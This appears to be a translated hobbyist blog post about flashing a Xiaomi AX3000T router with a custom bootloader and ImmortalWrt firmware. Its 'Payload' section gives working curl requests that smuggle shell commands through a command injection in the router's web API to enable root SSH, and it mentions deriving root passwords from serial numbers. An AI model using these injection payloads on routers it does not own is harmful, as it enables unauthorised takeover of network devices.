Introduction#
What is the meaning of "前朝遗老" (former dynasty's old people)? (Tactical backward lean) At the end of the month, there is still some reimbursement quota left, so I bought an ax3000t for 180 yuan to play with. The goods were delivered at four o'clock in the afternoon, and the wifi7 certificate was issued at eight o'clock in the evening.
Just waiting for me to become a former dynasty's old person, right?
Machine#
I have a very good impression of Brother Fa, especially his router SOC solution. Broadcom Qualcomm, etc., the experience is really not as good as Brother Fa.
Xiaomi's ax3000t uses a very mature solution.
| key | value |
|---|---|
| soc/cpu | MT7981B, aka Filogic 820, A53*2 @1.3GHz, 12nm |
| memory | 256MB ddr3 |
| flash | 128MB |
| antenna | 5!! (3 * 5G+2 * 2.4g) |
The reason for choosing it is, first, it is cheap, just within the affordable price range, and second, I have never played with MT7981B before, only its big brother, so I got it to play with.
The machine's board ID is similar to WR30U, the difference is that the back shield of ax3000t is not made. The number of antennas is also inconsistent.
Because... on the surface, ax3000t has four antennas, but in reality, it has five...
Links#
- Disassembly article: https://www.acwifi.net/23700.html
- https://www.youtube.com/watch?v=8PeUsbSjSpE
Beginning and End#
Xiaomi's routers, when I was still in middle school, just started to release their first-generation products.
But at that time, and even for a long time in the future, the non-flagship models, can really be described as electronic waste.
The most impressive one for me is this 4c. It's hard to imagine that during my time in college, in the pre-COVID era, this device with only three eyes and four antennas on its backside was used by my roommate in the dorm for four years! And it was sold for 79 yuan! 79 yuan! And even today, it can still be bought in the Xiaomi store!
I really can't imagine what the difference is between this thing and the tiny 150M single-antenna Mercury router I used in the ancient years.
But today, it has really improved a bit. Xiaomi's non-flagship routers have also shown some conscience. Although sometimes they upgrade and downgrade the configuration, at least they no longer have the stupidity of three eyes and four antennas. Many of Xiaomi's models are also the most cost-effective. To a large extent, they are also the most secure models (except for intentionally left vulnerabilities).
In recent times, ax3000t has been called the cost-performance ceiling for entry-level home wifi6 routers.
With the certificate issued today, it is likely to be the last wifi6 ceiling. Issuing a certificate is the best reason to raise prices. Although wifi7 is not useful, and most people who don't waste money on buying wifi7 haven't even bought wifi6 yet, even college students are still using the four-antenna 100M original flavor router, but price increases are always good.
Compared to Qualcomm's solution, Brother Fa has lower temperature, better ecology, solid foundation, and cheaper price. Although the driver is a bin, at least its bin is uploaded to git, and closed source is better than no source.
Flashing#
Actually, the original intention of writing this article was that there was no centralized place to write about flashing ax3000t. On the one hand, few experts would buy entry-level routers like ax3000t, on the other hand, everyone likes to make some money, which is also a reflection of the economic downturn.
Enabling ssh/dropbear#
There is a command injection vulnerability in Xiaomi's recent models.
[STOK] is a 32-bit hexadecimal hash value, which can be seen in the URL when logging into the Xiaomi router's backend.
Replace [STOK] in the payload with the valid hash value obtained after logging in, and execute the payload in a bash-like environment.
192.168.31.1 is the default address for ax3000t, as always.
Payload#
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Anvram%20commit%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A"
SSH password#
Xiaomi routers have a fixed algorithm for passwords, generated using the sn as a seed.
You can find it on many lonely websites, and the sn is case-sensitive.
The obtained root password should be eight characters long.
Connection#
Dropbear takes about 10 seconds to start.
Xiaomi's OpenWrt uses an old RSA. Connect via SSH.
ssh -oHostKeyAlgorithms=+ssh-rsa root@192.168.31.1
We can see the familiar "Little Strong" 5.4.171.
I think, you, Little Strong, must have grown up eating penguins, right? Hahaha
Upload#
https://github.com/hanwckf/bl-mt798x/releases/, here are the uboots for the mt857 family. In my opinion, college students should use this type of 857 router. Go to 985 and jump to 857. How can four antennas match a double first-class university?
In the dance zip, you can see the handsome guy mt7981_ax3000t-fip***.bin.
Upload it to tmp using scp or other methods.
Flashing#
Target block FIP
cd /tmp
mtd write mt7981_ax3000t-fip-fixed-parts-multi-layout.bin FIP
Power on#
After unplugging the power, hold down the reset button and plug it back in. Keep it plugged in for about 10 seconds, and you will see the LED light change color.
It is important to note that ax3000t is different from ax6000 and does not follow Xiaomi's ancestral instructions. The IP address of ax3000t under uboot is 192.168.1.1, not 192.168.31.1`
Connect the router to the computer with a wired connection, and set the gateway to 192.168.1.1.
Access 192.168.1.1.
Flashing#
An Immortalwrt variant for mediatek mt798x routers.
In terms of firmware, I prefer the immortalwrt written by the big guys in the 857 family. Immortal 857, doesn't this imply a profound meaning?
It is worth noting that the original partition (stock) layout is Xiaomi's ancestral ab, 56M mode. I prefer not to use ab and directly use the 112m layout.
During compilation, the heavy 256MB memory of ax3000t is not very resistant to tinkering, and with the recent trend of running away, there are many bugs and potential bugs in the clash meta. It is easy to run out of memory on its small body. As a college student, don't expand the memory excessively.
The flash of the 857 family is really fast, it's done in an instant.
Links#
- https://openwrt.org/toh/xiaomi/redmi_ax6000#getting_stok_token
- https://github.com/hanwckf/bl-mt798x/pull/26
Conclusion#
I am someone who likes to buy routers. Starting from the tomato router in my college office, I have been on the path of making everyone's network explode. Whether it's wired with spider webs or wirelessly bridging the swimming pool from the window, the days of playing with routers in college were really happy. At that time, everyone was very tolerant. Even if you only had three eyes, even if you only had 100Mbps, everyone could continue peacefully because the campus network was only 20Mbps.